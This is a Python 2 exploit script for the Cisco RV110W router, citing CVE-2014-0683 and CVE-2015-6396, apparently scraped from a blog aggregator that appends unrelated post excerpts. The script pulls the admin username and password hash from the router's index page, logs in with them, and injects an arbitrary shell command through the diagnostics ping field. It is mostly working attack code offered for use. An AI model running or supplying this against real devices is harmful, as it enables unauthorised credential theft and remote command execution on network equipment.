#!/usr/bin/env python2

#####

## Cisco RV110W Password Disclosure and OS Command Execute.

### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)

# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute

# Date: 2018-08

# Exploit Author: RySh

# Vendor Homepage: https://www.cisco.com/

# Version: 1.1.0.9

# Tested on: RV110W 1.1.0.9

# CVE : CVE-2014-0683, CVE-2015-6396

import os

import sys

import re

import urllib

import urllib2

import getopt

import json

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

###

# Usage: ./{script_name} 192.168.1.1 443 "reboot"

###

if __name__ == "__main__":

    IP = argv[1]

    PORT = argv[2]

    CMD = argv[3]

    # Get session key, Just access index page.

    url = 'https://' + IP + ':' + PORT + '/'

    req = urllib2.Request(url)

    result = urllib2.urlopen(req)

    res = result.read()

    # parse 'admin_pwd'! -- Get credits

    admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]

    admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]

    print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd

    # Get session_id by POST

    req2 = urllib2.Request(url + "login.cgi")

    req2.add_header('Origin', url)

    req2.add_header('Upgrade-Insecure-Requests', 1)

    req2.add_header('Content-Type', 'application/x-www-form-urlencoded')

    req2.add_header('User-Agent',

                    'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')

    req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')

    req2.add_header('Referer', url)

    req2.add_header('Accept-Encoding', 'gzip, deflate')

    req2.add_header('Accept-Language', 'en-US,en;q=0.9')

    req2.add_header('Cookie', 'SessionID=')

    data = {"submit_button": "login",

            "submit_type": "",

            "gui_action": "",

            "wait_time": "",

            "change_action": "",

            "enc": "",

            "user": admin_user,

            "pwd": admin_pwd,

            "sel_lang": "EN"

            }

    r = urllib2.urlopen(req2, urllib.urlencode(data))

    resp = r.read()

    login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]

    session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]

    # Execute your commands via diagnose command parameter, default command is `reboot`

    req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)

    req3.add_header('Origin', url)

    req3.add_header('Upgrade-Insecure-Requests', 1)

    req3.add_header('Content-Type', 'application/x-www-form-urlencoded')

    req3.add_header('User-Agent',

                    'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')

    req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')

    req3.add_header('Referer', url)

    req3.add_header('Accept-Encoding', 'gzip, deflate')

    req3.add_header('Accept-Language', 'en-US,en;q=0.9')

    req3.add_header('Cookie', 'SessionID=')

    data_cmd = {"submit_button": "Diagnostics",

            "change_action": "gozila_cgi",

            "submit_type": "start_ping",

            "gui_action": "",

            "traceroute_ip": "",

            "commit": "",

            "ping_times": "3 |" + CMD + "|",

            "ping_size": "",

            "wait_time": "",

            "ping_ip": "127.0.0.1",

            "lookup_name": ""

            }

    r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))

[EXP]Cisco RV110W - Password Disclosure / Command Execution的更多相关文章

  1. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. PowerShell vs. PsExec for Remote Command Execution

    Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...

  4. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  5. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  6. Fatal error encountered during command execution

    MySQL + .net + EF 开发环境,调用一处sql语句报错: Fatal error encountered during command execution[sql] view plain ...

  7. MYSQL报Fatal error encountered during command execution.错误的解决方法

    {MySql.Data.MySqlClient.MySqlException (0x80004005): Fatal error encountered during command executio ...

  8. My SQL和LINQ 实现ROW_NUMBER() OVER以及Fatal error encountered during command execution

    Oracle 和SQL server都有ROW_NUMBER() OVER这个功能函数,主要用于分组排序,而MySQL 却没有 SELECT * FROM (SELECT ROW_NUMBER() O ...

  9. JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution

    CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...

随机推荐

  1. FOB cost---从工厂到码头的费用

    1.主要是港杂费:陆运400元起,2个方450元,三个方500元,3个方以上按100元/方算起.

  2. Linux Ipv6地址配置

    Step1:启用IPV6网络配置 [root@node-1 ~]# vi /etc/sysconfig/network NETWORKING_IPV6=yes   //全局启用ipv6初始化IPV6_ ...

  3. cisco PBR

    access-list 2000 permit ip 10.11.50.0 0.0.0.255 anyaccess-list 2001 permit ip 10.11.50.0 0.0.0.255 1 ...

  4. Android 发送邮件以及定时发送邮件的实现

    本文以腾讯企业邮箱为例,展示如何发送邮件 及相关问题  选择腾讯企业邮箱是因为腾讯企业邮箱一般都是开启了smtp服务 项目地址:https://gitee.com/bimingcong/MySendE ...

  5. java重写equals方法需要注意的几点

    为什么equals()方法要重写? 判断两个对象在逻辑上是否相等,如根据类的成员变量来判断两个类的实例是否相等,而继承Object中的equals方法只能判断两个引用变量是否是同一个对象.这样我们往往 ...

  6. Fiddler 手机抓包 手机联网异常解决方案

    Fiddler在电脑里已经闲置很久了,之前看是不是服务器返回问题都是连上AS看输出的log,但是终归不如直接抓包来的方便 昨天搞了一下午,手机跟电脑都是连的公司的wifi,手机设置电脑ip和端口的网络 ...

  7. Error configuring application listener of class org.springframework.web.util

    解决方案: 1.打开工程属性对话框,到Deployment Assembly页面,点击Add 2. 选择Jave Build Path Entries 3. 把程序用于的Library加入进来 4.重 ...

  8. Mouse Detected Problem

    通常分三种情形: 鼠标完全不工作鼠标工作一段时间后不工作鼠标的按钮或者滚轮不工作 必要提交信息:1.鼠标的具体厂商和型号2.鼠标连接PC方式:串口.PS/2.USB或无线USB等:3.鼠标的工作机制: ...

  9. [Python] Window机器上同时安装Python 2 和 Python 3,如何兼容切换使用?

    不论python2还是python3,python可执行文件都叫python.exe,在cmd下输入python得到的版本号取决于环境变量里哪个版本的python路径更靠前. 切换的方法有3种(方法3 ...

  10. PHP脚本命令行执行成功,CRON无法执行故障解决记录

    先来看看一个最简单的PHP文件(ip.php) <?php $myip = get_ip_cmd(); echo($myip); // get ip address function get_i ...